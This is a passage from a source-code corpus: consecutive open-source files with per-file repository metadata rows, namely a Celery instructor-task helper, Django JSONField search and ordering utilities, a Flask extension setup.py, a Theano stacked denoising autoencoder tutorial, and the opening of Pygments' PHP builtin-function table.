'succeeded': number of attempts that "succeeded"
'skipped': number of attempts that "skipped"
'failed': number of attempts that "failed"
'total': number of possible subtasks to attempt
'action_name': user-visible verb to use in status messages.
Should be past-tense. Pass-through of input `action_name`.
'duration_ms': how long the task has (or had) been running.
"""
# Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
# There's no point in catching it here.
with outer_atomic():
entry = InstructorTask.objects.get(pk=entry_id)
entry.task_state = PROGRESS
entry.save_now()
# Get inputs to use in this task from the entry
task_id = entry.task_id
course_id = entry.course_id
task_input = json.loads(entry.task_input)
# Construct log message
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)
# Check that the task_id submitted in the InstructorTask matches the current task
# that is running.
request_task_id = _get_current_task().request.id
if task_id != request_task_id:
fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
TASK_LOG.error(message)
raise ValueError(message)
# Now do the work
with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
task_progress = task_fcn(entry_id, course_id, task_input, action_name)
# Release any queries that the connection has been hanging onto
reset_queries()
# Log and exit, returning task_progress info as task result
TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
return task_progress
def _get_current_task():
"""
Stub to make it easier to test without actually running Celery.
This is a wrapper around celery.current_task, which provides access
to the top of the stack of Celery's tasks. When running tests, however,
it doesn't seem to work to mock current_task directly, so this wrapper
is used to provide a hook to mock in tests, while providing the real
`current_task` in production.
"""
return current_task
| agpl-3.0 | 2,378,203,933,158,948,400 | 37.744361 | 113 | 0.659228 | false |
parksandwildlife/biosys | biosys/apps/main/utils_misc.py | 4 | 2739 | from django.db.models.expressions import RawSQL
def get_value(keys, dict_, default=None):
"""
Given a list of keys, search in a dict for the first matching keys (case insensitive) and return the value
Note: the search is case insensitive.
:param keys: list of possible keys
:param dict_:
:param default:
:return:
"""
keys = [k.lower() for k in keys]
# lower the dict keys
d_low = dict((k.lower(), v) for k, v in dict_.items())
for key in keys:
if key in d_low:
return d_low.get(key)
return default
def search_json_field(qs, json_field_name, keys, search_param):
"""
Search does not support searching within JSONField.
:param qs: queryset
:param json_field_name: json field with values within to search
:param keys: list of keys in json field to search
:param search_param: value to search
:return: the queryset after search filters applied
"""
where_clauses = []
params = []
for key in keys:
where_clauses.append(json_field_name + '->>%s ILIKE %s')
params += [key, '%' + search_param + '%']
return qs.extra(where=['OR '.join(where_clauses)], params=params)
def search_json_fields(qs, field_info, search_param):
"""
Search does not support searching within JSONField.
:param qs: queryset
:param field_info: dictionary with json_field_name as the key and each json_field's respective keys as the value
:param search_param: value to search
:return: the queryset after search filters applied
"""
where_clauses = []
params = []
for json_field_name in field_info.keys():
for key in field_info[json_field_name]:
where_clauses.append(json_field_name + '->>%s ILIKE %s')
params += [key, '%' + search_param + '%']
return qs.extra(where=['OR '.join(where_clauses)], params=params)
def order_by_json_field(qs, json_field_name, keys, ordering_param):
"""
Order by does not support ordering within JSONField.
:param qs: queryset
:param json_field_name: json field with values within to potentially order by
:param keys: list of keys in json field to potentially order by
:param ordering_param: field to order by, prefixed with '-' for descending order
:return: the queryset after ordering is applied if order_by param is within the json field
"""
for key in keys:
if ordering_param == key or ordering_param == '-' + key:
if ordering_param.startswith('-'):
qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param[1:],)).desc())
else:
qs = qs.order_by(RawSQL(json_field_name + '->%s', (ordering_param,)))
return qs
| apache-2.0 | -3,675,758,877,846,044,000 | 34.571429 | 116 | 0.636364 | false |
lovette/flask_signedcookies | setup.py | 1 | 1129 | from setuptools import setup
setup(
name='flask_signedcookies',
version='1.0.0',
url='https://github.com/lovette/flask_signedcookies',
download_url = 'https://github.com/lovette/flask_signedcookies/archive/master.tar.gz',
license='BSD',
author='Lance Lovette',
author_email='[email protected]',
description='Flask extension that provides easy access to signed cookies.',
long_description=open('README.md').read(),
py_modules=['flask_signedcookies',],
install_requires=['Flask',],
tests_require=['nose',],
zip_safe=False,
platforms='any',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| bsd-3-clause | -7,898,864,492,778,144,000 | 36.633333 | 87 | 0.638618 | false |
fegonda/icon_demo | code/external/SdA.py | 4 | 18933 | """
This tutorial introduces stacked denoising auto-encoders (SdA) using Theano.
Denoising autoencoders are the building blocks for SdA.
They are based on auto-encoders as the ones used in Bengio et al. 2007.
An autoencoder takes an input x and first maps it to a hidden representation
y = f_{\theta}(x) = s(Wx+b), parameterized by \theta={W,b}. The resulting
latent representation y is then mapped back to a "reconstructed" vector
z \in [0,1]^d in input space z = g_{\theta'}(y) = s(W'y + b'). The weight
matrix W' can optionally be constrained such that W' = W^T, in which case
the autoencoder is said to have tied weights. The network is trained such
that to minimize the reconstruction error (the error between x and z).
For the denosing autoencoder, during training, first x is corrupted into
\tilde{x}, where \tilde{x} is a partially destroyed version of x by means
of a stochastic mapping. Afterwards y is computed as before (using
\tilde{x}), y = s(W\tilde{x} + b) and z as s(W'y + b'). The reconstruction
error is now measured between z and the uncorrupted input x, which is
computed as the cross-entropy :
- \sum_{k=1}^d[ x_k \log z_k + (1-x_k) \log( 1-z_k)]
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML'08, 1096-1103,
2008
- Y. Bengio, P. Lamblin, D. Popovici, H. Larochelle: Greedy Layer-Wise
Training of Deep Networks, Advances in Neural Information Processing
Systems 19, 2007
"""
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
from theano.tensor.shared_randomstreams import RandomStreams
from logistic_sgd import LogisticRegression, load_data
from mlp import HiddenLayer
from dA import dA
# start-snippet-1
class SdA(object):
"""Stacked denoising auto-encoder class (SdA)
A stacked denoising autoencoder model is obtained by stacking several
dAs. The hidden layer of the dA at layer `i` becomes the input of
the dA at layer `i+1`. The first layer dA gets as input the input of
the SdA, and the hidden layer of the last dA represents the output.
Note that after pretraining, the SdA is dealt with as a normal MLP,
the dAs are only used to initialize the weights.
"""
def __init__(
self,
numpy_rng,
theano_rng=None,
n_ins=784,
hidden_layers_sizes=[500, 500],
n_outs=10,
corruption_levels=[0.1, 0.1]
):
""" This class is made to support a variable number of layers.
:type numpy_rng: numpy.random.RandomState
:param numpy_rng: numpy random number generator used to draw initial
weights
:type theano_rng: theano.tensor.shared_randomstreams.RandomStreams
:param theano_rng: Theano random generator; if None is given one is
generated based on a seed drawn from `rng`
:type n_ins: int
:param n_ins: dimension of the input to the sdA
:type n_layers_sizes: list of ints
:param n_layers_sizes: intermediate layers size, must contain
at least one value
:type n_outs: int
:param n_outs: dimension of the output of the network
:type corruption_levels: list of float
:param corruption_levels: amount of corruption to use for each
layer
"""
self.sigmoid_layers = []
self.dA_layers = []
self.params = []
self.n_layers = len(hidden_layers_sizes)
assert self.n_layers > 0
if not theano_rng:
theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))
# allocate symbolic variables for the data
self.x = T.matrix('x') # the data is presented as rasterized images
self.y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
# end-snippet-1
# The SdA is an MLP, for which all weights of intermediate layers
# are shared with a different denoising autoencoders
# We will first construct the SdA as a deep multilayer perceptron,
# and when constructing each sigmoidal layer we also construct a
# denoising autoencoder that shares weights with that layer
# During pretraining we will train these autoencoders (which will
# lead to chainging the weights of the MLP as well)
# During finetunining we will finish training the SdA by doing
# stochastich gradient descent on the MLP
# start-snippet-2
for i in xrange(self.n_layers):
# construct the sigmoidal layer
# the size of the input is either the number of hidden units of
# the layer below or the input size if we are on the first layer
if i == 0:
input_size = n_ins
else:
input_size = hidden_layers_sizes[i - 1]
# the input to this layer is either the activation of the hidden
# layer below or the input of the SdA if you are on the first
# layer
if i == 0:
layer_input = self.x
else:
layer_input = self.sigmoid_layers[-1].output
sigmoid_layer = HiddenLayer(rng=numpy_rng,
input=layer_input,
n_in=input_size,
n_out=hidden_layers_sizes[i],
activation=T.nnet.sigmoid)
# add the layer to our list of layers
self.sigmoid_layers.append(sigmoid_layer)
# its arguably a philosophical question...
# but we are going to only declare that the parameters of the
# sigmoid_layers are parameters of the StackedDAA
# the visible biases in the dA are parameters of those
# dA, but not the SdA
self.params.extend(sigmoid_layer.params)
# Construct a denoising autoencoder that shared weights with this
# layer
dA_layer = dA(numpy_rng=numpy_rng,
theano_rng=theano_rng,
input=layer_input,
n_visible=input_size,
n_hidden=hidden_layers_sizes[i],
W=sigmoid_layer.W,
bhid=sigmoid_layer.b)
self.dA_layers.append(dA_layer)
# end-snippet-2
# We now need to add a logistic layer on top of the MLP
self.logLayer = LogisticRegression(
input=self.sigmoid_layers[-1].output,
n_in=hidden_layers_sizes[-1],
n_out=n_outs
)
self.params.extend(self.logLayer.params)
# construct a function that implements one step of finetunining
# compute the cost for second phase of training,
# defined as the negative log likelihood
self.finetune_cost = self.logLayer.negative_log_likelihood(self.y)
# compute the gradients with respect to the model parameters
# symbolic variable that points to the number of errors made on the
# minibatch given by self.x and self.y
self.errors = self.logLayer.errors(self.y)
def pretraining_functions(self, train_set_x, batch_size):
''' Generates a list of functions, each of them implementing one
step in trainnig the dA corresponding to the layer with same index.
The function will require as input the minibatch index, and to train
a dA you just need to iterate, calling the corresponding function on
all minibatch indexes.
:type train_set_x: theano.tensor.TensorType
:param train_set_x: Shared variable that contains all datapoints used
for training the dA
:type batch_size: int
:param batch_size: size of a [mini]batch
:type learning_rate: float
:param learning_rate: learning rate used during training for any of
the dA layers
'''
# index to a [mini]batch
index = T.lscalar('index') # index to a minibatch
corruption_level = T.scalar('corruption') # % of corruption to use
learning_rate = T.scalar('lr') # learning rate to use
# begining of a batch, given `index`
batch_begin = index * batch_size
# ending of a batch given `index`
batch_end = batch_begin + batch_size
pretrain_fns = []
for dA in self.dA_layers:
# get the cost and the updates list
cost, updates = dA.get_cost_updates(corruption_level,
learning_rate)
# compile the theano function
fn = theano.function(
inputs=[
index,
theano.Param(corruption_level, default=0.2),
theano.Param(learning_rate, default=0.1)
],
outputs=cost,
updates=updates,
givens={
self.x: train_set_x[batch_begin: batch_end]
}
)
# append `fn` to the list of functions
pretrain_fns.append(fn)
return pretrain_fns
def build_finetune_functions(self, datasets, batch_size, learning_rate):
'''Generates a function `train` that implements one step of
finetuning, a function `validate` that computes the error on
a batch from the validation set, and a function `test` that
computes the error on a batch from the testing set
:type datasets: list of pairs of theano.tensor.TensorType
:param datasets: It is a list that contain all the datasets;
the has to contain three pairs, `train`,
`valid`, `test` in this order, where each pair
is formed of two Theano variables, one for the
datapoints, the other for the labels
:type batch_size: int
:param batch_size: size of a minibatch
:type learning_rate: float
:param learning_rate: learning rate used during finetune stage
'''
(train_set_x, train_set_y) = datasets[0]
(valid_set_x, valid_set_y) = datasets[1]
(test_set_x, test_set_y) = datasets[2]
# compute number of minibatches for training, validation and testing
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]
n_valid_batches /= batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0]
n_test_batches /= batch_size
index = T.lscalar('index') # index to a [mini]batch
# compute the gradients with respect to the model parameters
gparams = T.grad(self.finetune_cost, self.params)
# compute list of fine-tuning updates
updates = [
(param, param - gparam * learning_rate)
for param, gparam in zip(self.params, gparams)
]
train_fn = theano.function(
inputs=[index],
outputs=self.finetune_cost,
updates=updates,
givens={
self.x: train_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: train_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='train'
)
test_score_i = theano.function(
[index],
self.errors,
givens={
self.x: test_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: test_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='test'
)
valid_score_i = theano.function(
[index],
self.errors,
givens={
self.x: valid_set_x[
index * batch_size: (index + 1) * batch_size
],
self.y: valid_set_y[
index * batch_size: (index + 1) * batch_size
]
},
name='valid'
)
# Create a function that scans the entire validation set
def valid_score():
return [valid_score_i(i) for i in xrange(n_valid_batches)]
# Create a function that scans the entire test set
def test_score():
return [test_score_i(i) for i in xrange(n_test_batches)]
return train_fn, valid_score, test_score
def test_SdA(finetune_lr=0.1, pretraining_epochs=15,
pretrain_lr=0.001, training_epochs=1000,
dataset='mnist.pkl.gz', batch_size=1):
"""
Demonstrates how to train and test a stochastic denoising autoencoder.
This is demonstrated on MNIST.
:type learning_rate: float
:param learning_rate: learning rate used in the finetune stage
(factor for the stochastic gradient)
:type pretraining_epochs: int
:param pretraining_epochs: number of epoch to do pretraining
:type pretrain_lr: float
:param pretrain_lr: learning rate to be used during pre-training
:type n_iter: int
:param n_iter: maximal number of iterations ot run the optimizer
:type dataset: string
:param dataset: path the the pickled dataset
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0]
n_train_batches /= batch_size
# numpy random generator
# start-snippet-3
numpy_rng = numpy.random.RandomState(89677)
print '... building the model'
# construct the stacked denoising autoencoder class
sda = SdA(
numpy_rng=numpy_rng,
n_ins=28 * 28,
hidden_layers_sizes=[1000, 1000, 1000],
n_outs=10
)
# end-snippet-3 start-snippet-4
#########################
# PRETRAINING THE MODEL #
#########################
print '... getting the pretraining functions'
pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x,
batch_size=batch_size)
print '... pre-training the model'
start_time = time.clock()
## Pre-train layer-wise
corruption_levels = [.1, .2, .3]
for i in xrange(sda.n_layers):
# go through pretraining epochs
for epoch in xrange(pretraining_epochs):
# go through the training set
c = []
for batch_index in xrange(n_train_batches):
c.append(pretraining_fns[i](index=batch_index,
corruption=corruption_levels[i],
lr=pretrain_lr))
print 'Pre-training layer %i, epoch %d, cost ' % (i, epoch),
print numpy.mean(c)
end_time = time.clock()
print >> sys.stderr, ('The pretraining code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
# end-snippet-4
########################
# FINETUNING THE MODEL #
########################
# get the training, validation and testing function for the model
print '... getting the finetuning functions'
train_fn, validate_model, test_model = sda.build_finetune_functions(
datasets=datasets,
batch_size=batch_size,
learning_rate=finetune_lr
)
print '... finetunning the model'
# early-stopping parameters
patience = 10 * n_train_batches # look as this many examples regardless
patience_increase = 2. # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
test_score = 0.
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < training_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_fn(minibatch_index)
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
validation_losses = validate_model()
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' %
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if (
this_validation_loss < best_validation_loss *
improvement_threshold
):
patience = max(patience, iter * patience_increase)
# save best validation score and iteration number
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = test_model()
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f %%') %
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
if patience <= iter:
done_looping = True
break
end_time = time.clock()
print(
(
'Optimization complete with best validation score of %f %%, '
'on iteration %i, '
'with test performance %f %%'
)
% (best_validation_loss * 100., best_iter + 1, test_score * 100.)
)
print >> sys.stderr, ('The training code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
if __name__ == '__main__':
test_SdA()
| mit | -3,914,538,588,230,447,000 | 37.717791 | 77 | 0.567316 | false |
sebfung/yellowpillowcase | vendor/cache/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/lexers/_phpbuiltins.py | 47 | 154371 | # -*- coding: utf-8 -*-
"""
pygments.lexers._phpbuiltins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This file loads the function names and their modules from the
php webpage and generates itself.
Do not alter the MODULES dict by hand!
WARNING: the generation transfers quite much data over your
internet connection. don't run that at home, use
a server ;-)
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
MODULES = {'.NET': ['dotnet_load'],
'APC': ['apc_add',
'apc_bin_dump',
'apc_bin_dumpfile',
'apc_bin_load',
'apc_bin_loadfile',
'apc_cache_info',
'apc_cas',
'apc_clear_cache',
'apc_compile_file',
'apc_dec',
'apc_define_constants',
'apc_delete_file',
'apc_delete',
'apc_exists',
'apc_fetch',
'apc_inc',
'apc_load_constants',
'apc_sma_info',
'apc_store'],
'APD': ['apd_breakpoint',
'apd_callstack',
'apd_clunk',
'apd_continue',
'apd_croak',
'apd_dump_function_table',
'apd_dump_persistent_resources',
'apd_dump_regular_resources',
'apd_echo',
'apd_get_active_symbols',
'apd_set_pprof_trace',
'apd_set_session_trace_socket',
'apd_set_session_trace',
'apd_set_session',
'override_function',
'rename_function'],
'Aliases and deprecated Mysqli': ['mysqli_bind_param',
'mysqli_bind_result',
'mysqli_client_encoding',
'mysqli_connect',
'mysqli_disable_rpl_parse',
'mysqli_enable_reads_from_master',
'mysqli_enable_rpl_parse',
'mysqli_escape_string',
'mysqli_execute',
'mysqli_fetch',
'mysqli_get_cache_stats',
'mysqli_get_metadata',
'mysqli_master_query',
'mysqli_param_count',
'mysqli_report',
'mysqli_rpl_parse_enabled',
'mysqli_rpl_probe',
'mysqli_send_long_data',
'mysqli_slave_query'],
'Apache': ['apache_child_terminate',
'apache_get_modules',
'apache_get_version',
'apache_getenv',
'apache_lookup_uri',
'apache_note',
'apache_request_headers',
'apache_reset_timeout',
'apache_response_headers',
'apache_setenv',
'getallheaders',
'virtual'],
'Array': ['array_change_key_case',
'array_chunk',
'array_column',
'array_combine',
'array_count_values',
'array_diff_assoc',
'array_diff_key',
'array_diff_uassoc',
'array_diff_ukey',
'array_diff',
'array_fill_keys',
'array_fill',
'array_filter',
'array_flip',
'array_intersect_assoc',
'array_intersect_key',
'array_intersect_uassoc',
'array_intersect_ukey',
'array_intersect',
'array_key_exists',
'array_keys',
'array_map',
'array_merge_recursive',
'array_merge',
'array_multisort',
'array_pad',
'array_pop',
'array_product',
'array_push',
'array_rand',
'array_reduce',
'array_replace_recursive',
'array_replace',
'array_reverse',
'array_search',
'array_shift',
'array_slice',
'array_splice',
'array_sum',
'array_udiff_assoc',
'array_udiff_uassoc',
'array_udiff',
'array_uintersect_assoc',
'array_uintersect_uassoc',
'array_uintersect',
'array_unique',
'array_unshift',
'array_values',
'array_walk_recursive',
'array_walk',
'array',
'arsort',
'asort',
'compact',
'count',
'current',
'each',
'end',
'extract',
'in_array',
'key_exists',
'key',
'krsort',
'ksort',
'list',
'natcasesort',
'natsort',
'next',
'pos',
'prev',
'range',
'reset',
'rsort',
'shuffle',
'sizeof',
'sort',
'uasort',
'uksort',
'usort'],
'BBCode': ['bbcode_add_element',
'bbcode_add_smiley',
'bbcode_create',
'bbcode_destroy',
'bbcode_parse',
'bbcode_set_arg_parser',
'bbcode_set_flags'],
'BC Math': ['bcadd',
'bccomp',
'bcdiv',
'bcmod',
'bcmul',
'bcpow',
'bcpowmod',
'bcscale',
'bcsqrt',
'bcsub'],
'Blenc': ['blenc_encrypt'],
'Bzip2': ['bzclose',
'bzcompress',
'bzdecompress',
'bzerrno',
'bzerror',
'bzerrstr',
'bzflush',
'bzopen',
'bzread',
'bzwrite'],
'COM': ['com_addref',
'com_create_guid',
'com_event_sink',
'com_get_active_object',
'com_get',
'com_invoke',
'com_isenum',
'com_load_typelib',
'com_load',
'com_message_pump',
'com_print_typeinfo',
'com_propget',
'com_propput',
'com_propset',
'com_release',
'com_set',
'variant_abs',
'variant_add',
'variant_and',
'variant_cast',
'variant_cat',
'variant_cmp',
'variant_date_from_timestamp',
'variant_date_to_timestamp',
'variant_div',
'variant_eqv',
'variant_fix',
'variant_get_type',
'variant_idiv',
'variant_imp',
'variant_int',
'variant_mod',
'variant_mul',
'variant_neg',
'variant_not',
'variant_or',
'variant_pow',
'variant_round',
'variant_set_type',
'variant_set',
'variant_sub',
'variant_xor'],
'CUBRID': ['cubrid_bind',
'cubrid_close_prepare',
'cubrid_close_request',
'cubrid_col_get',
'cubrid_col_size',
'cubrid_column_names',
'cubrid_column_types',
'cubrid_commit',
'cubrid_connect_with_url',
'cubrid_connect',
'cubrid_current_oid',
'cubrid_disconnect',
'cubrid_drop',
'cubrid_error_code_facility',
'cubrid_error_code',
'cubrid_error_msg',
'cubrid_execute',
'cubrid_fetch',
'cubrid_free_result',
'cubrid_get_autocommit',
'cubrid_get_charset',
'cubrid_get_class_name',
'cubrid_get_client_info',
'cubrid_get_db_parameter',
'cubrid_get_query_timeout',
'cubrid_get_server_info',
'cubrid_get',
'cubrid_insert_id',
'cubrid_is_instance',
'cubrid_lob_close',
'cubrid_lob_export',
'cubrid_lob_get',
'cubrid_lob_send',
'cubrid_lob_size',
'cubrid_lob2_bind',
'cubrid_lob2_close',
'cubrid_lob2_export',
'cubrid_lob2_import',
'cubrid_lob2_new',
'cubrid_lob2_read',
'cubrid_lob2_seek64',
'cubrid_lob2_seek',
'cubrid_lob2_size64',
'cubrid_lob2_size',
'cubrid_lob2_tell64',
'cubrid_lob2_tell',
'cubrid_lob2_write',
'cubrid_lock_read',
'cubrid_lock_write',
'cubrid_move_cursor',
'cubrid_next_result',
'cubrid_num_cols',
'cubrid_num_rows',
'cubrid_pconnect_with_url',
'cubrid_pconnect',
'cubrid_prepare',
'cubrid_put',
'cubrid_rollback',
'cubrid_schema',
'cubrid_seq_drop',
'cubrid_seq_insert',
'cubrid_seq_put',
'cubrid_set_add',
'cubrid_set_autocommit',
'cubrid_set_db_parameter',
'cubrid_set_drop',
'cubrid_set_query_timeout',
'cubrid_version'],
'Cairo': ['cairo_create',
'cairo_font_face_get_type',
'cairo_font_face_status',
'cairo_font_options_create',
'cairo_font_options_equal',
'cairo_font_options_get_antialias',
'cairo_font_options_get_hint_metrics',
'cairo_font_options_get_hint_style',
'cairo_font_options_get_subpixel_order',
'cairo_font_options_hash',
'cairo_font_options_merge',
'cairo_font_options_set_antialias',
'cairo_font_options_set_hint_metrics',
'cairo_font_options_set_hint_style',
'cairo_font_options_set_subpixel_order',
'cairo_font_options_status',
'cairo_format_stride_for_width',
'cairo_image_surface_create_for_data',
'cairo_image_surface_create_from_png',
'cairo_image_surface_create',
'cairo_image_surface_get_data',
'cairo_image_surface_get_format',
'cairo_image_surface_get_height',
'cairo_image_surface_get_stride',
'cairo_image_surface_get_width',
'cairo_matrix_create_scale',
'cairo_matrix_create_translate',
'cairo_matrix_invert',
'cairo_matrix_multiply',
'cairo_matrix_rotate',
'cairo_matrix_transform_distance',
'cairo_matrix_transform_point',
'cairo_matrix_translate',
'cairo_pattern_add_color_stop_rgb',
'cairo_pattern_add_color_stop_rgba',
'cairo_pattern_create_for_surface',
'cairo_pattern_create_linear',
'cairo_pattern_create_radial',
'cairo_pattern_create_rgb',
'cairo_pattern_create_rgba',
'cairo_pattern_get_color_stop_count',
'cairo_pattern_get_color_stop_rgba',
'cairo_pattern_get_extend',
'cairo_pattern_get_filter',
'cairo_pattern_get_linear_points',
'cairo_pattern_get_matrix',
'cairo_pattern_get_radial_circles',
'cairo_pattern_get_rgba',
'cairo_pattern_get_surface',
'cairo_pattern_get_type',
'cairo_pattern_set_extend',
'cairo_pattern_set_filter',
'cairo_pattern_set_matrix',
'cairo_pattern_status',
'cairo_pdf_surface_create',
'cairo_pdf_surface_set_size',
'cairo_ps_get_levels',
'cairo_ps_level_to_string',
'cairo_ps_surface_create',
'cairo_ps_surface_dsc_begin_page_setup',
'cairo_ps_surface_dsc_begin_setup',
'cairo_ps_surface_dsc_comment',
'cairo_ps_surface_get_eps',
'cairo_ps_surface_restrict_to_level',
'cairo_ps_surface_set_eps',
'cairo_ps_surface_set_size',
'cairo_scaled_font_create',
'cairo_scaled_font_extents',
'cairo_scaled_font_get_ctm',
'cairo_scaled_font_get_font_face',
'cairo_scaled_font_get_font_matrix',
'cairo_scaled_font_get_font_options',
'cairo_scaled_font_get_scale_matrix',
'cairo_scaled_font_get_type',
'cairo_scaled_font_glyph_extents',
'cairo_scaled_font_status',
'cairo_scaled_font_text_extents',
'cairo_surface_copy_page',
'cairo_surface_create_similar',
'cairo_surface_finish',
'cairo_surface_flush',
'cairo_surface_get_content',
'cairo_surface_get_device_offset',
'cairo_surface_get_font_options',
'cairo_surface_get_type',
'cairo_surface_mark_dirty_rectangle',
'cairo_surface_mark_dirty',
'cairo_surface_set_device_offset',
'cairo_surface_set_fallback_resolution',
'cairo_surface_show_page',
'cairo_surface_status',
'cairo_surface_write_to_png',
'cairo_svg_surface_create',
'cairo_svg_surface_restrict_to_version',
'cairo_svg_version_to_string'],
'Calendar': ['cal_days_in_month',
'cal_from_jd',
'cal_info',
'cal_to_jd',
'easter_date',
'easter_days',
'FrenchToJD',
'GregorianToJD',
'JDDayOfWeek',
'JDMonthName',
'JDToFrench',
'JDToGregorian',
'jdtojewish',
'JDToJulian',
'jdtounix',
'JewishToJD',
'JulianToJD',
'unixtojd'],
'Classes/Object': ['__autoload',
'call_user_method_array',
'call_user_method',
'class_alias',
'class_exists',
'get_called_class',
'get_class_methods',
'get_class_vars',
'get_class',
'get_declared_classes',
'get_declared_interfaces',
'get_declared_traits',
'get_object_vars',
'get_parent_class',
'interface_exists',
'is_a',
'is_subclass_of',
'method_exists',
'property_exists',
'trait_exists'],
'Classkit': ['classkit_import',
'classkit_method_add',
'classkit_method_copy',
'classkit_method_redefine',
'classkit_method_remove',
'classkit_method_rename'],
'Crack': ['crack_check',
'crack_closedict',
'crack_getlastmessage',
'crack_opendict'],
'Ctype': ['ctype_alnum',
'ctype_alpha',
'ctype_cntrl',
'ctype_digit',
'ctype_graph',
'ctype_lower',
'ctype_print',
'ctype_punct',
'ctype_space',
'ctype_upper',
'ctype_xdigit'],
'Cyrus': ['cyrus_authenticate',
'cyrus_bind',
'cyrus_close',
'cyrus_connect',
'cyrus_query',
'cyrus_unbind'],
'DB++': ['dbplus_add',
'dbplus_aql',
'dbplus_chdir',
'dbplus_close',
'dbplus_curr',
'dbplus_errcode',
'dbplus_errno',
'dbplus_find',
'dbplus_first',
'dbplus_flush',
'dbplus_freealllocks',
'dbplus_freelock',
'dbplus_freerlocks',
'dbplus_getlock',
'dbplus_getunique',
'dbplus_info',
'dbplus_last',
'dbplus_lockrel',
'dbplus_next',
'dbplus_open',
'dbplus_prev',
'dbplus_rchperm',
'dbplus_rcreate',
'dbplus_rcrtexact',
'dbplus_rcrtlike',
'dbplus_resolve',
'dbplus_restorepos',
'dbplus_rkeys',
'dbplus_ropen',
'dbplus_rquery',
'dbplus_rrename',
'dbplus_rsecindex',
'dbplus_runlink',
'dbplus_rzap',
'dbplus_savepos',
'dbplus_setindex',
'dbplus_setindexbynumber',
'dbplus_sql',
'dbplus_tcl',
'dbplus_tremove',
'dbplus_undo',
'dbplus_undoprepare',
'dbplus_unlockrel',
'dbplus_unselect',
'dbplus_update',
'dbplus_xlockrel',
'dbplus_xunlockrel'],
'DBA': ['dba_close',
'dba_delete',
'dba_exists',
'dba_fetch',
'dba_firstkey',
'dba_handlers',
'dba_insert',
'dba_key_split',
'dba_list',
'dba_nextkey',
'dba_open',
'dba_optimize',
'dba_popen',
'dba_replace',
'dba_sync'],
'DOM': ['dom_import_simplexml'],
'Date/Time': ['checkdate',
'date_add',
'date_create_from_format',
'date_create_immutable_from_format',
'date_create_immutable',
'date_create',
'date_date_set',
'date_default_timezone_get',
'date_default_timezone_set',
'date_diff',
'date_format',
'date_get_last_errors',
'date_interval_create_from_date_string',
'date_interval_format',
'date_isodate_set',
'date_modify',
'date_offset_get',
'date_parse_from_format',
'date_parse',
'date_sub',
'date_sun_info',
'date_sunrise',
'date_sunset',
'date_time_set',
'date_timestamp_get',
'date_timestamp_set',
'date_timezone_get',
'date_timezone_set',
'date',
'getdate',
'gettimeofday',
'gmdate',
'gmmktime',
'gmstrftime',
'idate',
'localtime',
'microtime',
'mktime',
'strftime',
'strptime',
'strtotime',
'time',
'timezone_abbreviations_list',
'timezone_identifiers_list',
'timezone_location_get',
'timezone_name_from_abbr',
'timezone_name_get',
'timezone_offset_get',
'timezone_open',
'timezone_transitions_get',
'timezone_version_get'],
'Direct IO': ['dio_close',
'dio_fcntl',
'dio_open',
'dio_read',
'dio_seek',
'dio_stat',
'dio_tcsetattr',
'dio_truncate',
'dio_write'],
'Directory': ['chdir',
'chroot',
'closedir',
'dir',
'getcwd',
'opendir',
'readdir',
'rewinddir',
'scandir'],
'Eio': ['eio_busy',
'eio_cancel',
'eio_chmod',
'eio_chown',
'eio_close',
'eio_custom',
'eio_dup2',
'eio_event_loop',
'eio_fallocate',
